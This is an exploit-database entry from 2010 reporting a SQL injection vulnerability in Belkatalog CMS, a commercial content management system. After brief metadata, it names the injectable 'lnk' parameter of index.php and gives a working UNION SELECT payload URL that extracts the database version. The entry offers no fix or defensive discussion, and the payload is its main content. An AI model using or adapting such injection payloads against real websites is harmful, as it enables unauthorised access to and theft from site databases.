Belkatalog CMS SQL Injection Vulnerability

2010-02-07T00:00:00
ID 1337DAY-ID-10782
Type zdt
Reporter 73o
Modified 2010-02-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================
Belkatalog CMS SQL Injection Vulnerability
==========================================

#Title:Belkatalog CMS--- sql injection vulnerability
 
#Belkatalog CMS is comercial cms developed by croatian developer J. K. "Ga?o"
#and it is vulnerable to sql injection vulnerability
 
 
#http://site.com/[cms]/index.php?id=m&lnk='[sql injection here]
 
 
 
#there are few examples:
http://server/index.php?id=m&lnk=-9999+union+all+select+1,version(),3,4,5,6--




#  0day.today [2018-02-20]  #